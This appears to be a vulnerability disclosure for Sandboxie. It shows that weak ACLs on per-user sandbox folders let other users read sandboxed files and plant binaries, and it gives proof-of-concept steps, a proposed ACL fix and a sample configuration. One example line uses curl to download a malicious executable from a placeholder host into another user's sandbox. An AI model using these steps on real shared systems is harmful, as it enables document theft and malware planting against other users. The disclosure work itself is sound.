Summary

An authenticated user (UserA) with no privileges is authorized to read all files created in sandbox belonging to other users in the sandbox folders C:\Sandbox\UserB\xxx.

Details

An authenticated attacker who can use explorer.exe or cmd.exe outside any sandbox can read other users' files in C:\Sandbox\xxx.
By default in Windows 7+, the C:\Users\UserA folder is not readable by UserB.
All files edited or created during the sandbox processing are affected by the vulnerability. All files in C:\Users are safe.
Note: If UserB runs a cmd in a sandbox, it won't be able to access C:\Sandox, which is a good thing.
UPDATE: If UserB runs a cmd in a sandbox, he will be able to access C:\Sandox\UserA !

UPDATE 2: In addition, if UserB create a folder C:\Sandbox\UserA with malicious ACLs, when UserA will user the sandbox, Sandboxie doesn't reset ACLs !

PoC

1. Create two users net user /add UserA passwordA ; net user /add UserB passwordB
2. Run a simple cmd.exe in a Standard Sandbox with UserA and create any file (ie echo example > C:\example)
3. Run a cmd.exe as UserB outside of any sandboxes. Then cat the file C:\Sandbox\UserA\drive\c\example
   Example with personnal folder:
   

Impact

This case is quite critical in shared environments such as RDS / Citrix :

An attacker was able to hijack sensitives documents from other users.

Scenario 2: An attacker can put a malicous file into the sandbox of other users and gain UserA's sandboxed context. If a attacker (UserB) puts a malicious binary into another user's (UserA) sandbox, the attacker will gain temporary access into UserA's sandboxed context.
Example:

PS C:\> whoami
UserB
PS C:\> # not sandboxed
PS C:\> curl.exe https://xxx/malicious.exe --output C:\Sandbox\UserA\New_Box\drive\C\PaymentSystem\pay.exe

When UserA executes pay.exe the New_Box sandbox, instead of pay.exe, malware is executed.

Fix

When creating the user directory in the sandbox (C:\Sandbox\xxx), Sandboxie must change the ACL of the user folder (C:\Sandbox\xxx) to (ACL on this folder, subfolder and all files)

• Creator Owner: FULL
• UserXXXXX: Full
  💥These ACLs must be reset before running any process in the sandbox.

I tried to change ACL of C:\Sandbox but if you know the username it's still possible to read all files because ACL set on C:\Sandbox\xxx are weak

Sandboxie configuration

[GlobalSettings]
DefaultBox=New_Box
# Enable network filtering
NetworkEnableWFP=y
# Temporary storage of files
FileRootPath=\??\%SystemDrive%\Sandbox\%USER%\%SANDBOX%
# Temporary storage of registry
KeyRootPath=\REGISTRY\USER\Sandbox_%USER%_%SANDBOX%
# Temporary storage of IPC ccommunications
IpcRootPath=\Sandbox\%USER%\%SANDBOX%\Session_%SESSION%
Template=WindowsRasMan
Template=WindowsLive
Template=OfficeLicensing
Template=7zipShellEx
Template=Edge_Fix
Template=OfficeClickToRun
# Only local admins are allowed to edit this file
# It’s possible to add a password to protect the file, but the update of this file will be possible only via the GUI
EditAdminOnly=y
ForceDisableAdminOnly=y
ForgetPassword=y
# Avoid the tray icon
SbieCtrl_AutoStartAgent= 
SbieCtrl_EnableAutoStart=n
SbieCtrl_EnableLogonStart=n
# Set default user’s pref
SbieCtrl_AddDesktopIcon=n
SbieCtrl_AddQuickLaunchIcon=n
SbieCtrl_AddContextMenu=n
SbieCtrl_AddSendToMenu=n
SbieCtrl_AutoRunSoftCompat=n
SbieCtrl_HideMessage=*
SbieCtrl_HideWindowNotify=y
RunCommand=cmd|cmd.exe
ForceDisableSeconds=30

[UserSettings_Default]
# Set default user’s pref
SbieCtrl_AddDesktopIcon=n
SbieCtrl_AddQuickLaunchIcon=n
SbieCtrl_AddContextMenu=n
SbieCtrl_AddSendToMenu=n
SbieCtrl_AutoStartAgent= 
SbieCtrl_EnableAutoStart=n
SbieCtrl_EnableLogonStart=n
SbieCtrl_HideWindowNotify=y
SbieCtrl_HideMessage=*
SbieCtrl_AutoRunSoftCompat=n

[New_Box]
Enabled=y
BlockNetworkFiles=y
BorderColor=#02f6f6,ttl
Template=OpenBluetooth
Template=SkipHook
Template=FileCopy
Template=qWave
Template=BlockPorts
Template=LingerPrograms
Template=AutoRecoverIgnore
ConfigLevel=10
UseFileDeleteV2=y
UseRegDeleteV2=y
AutoRecover=n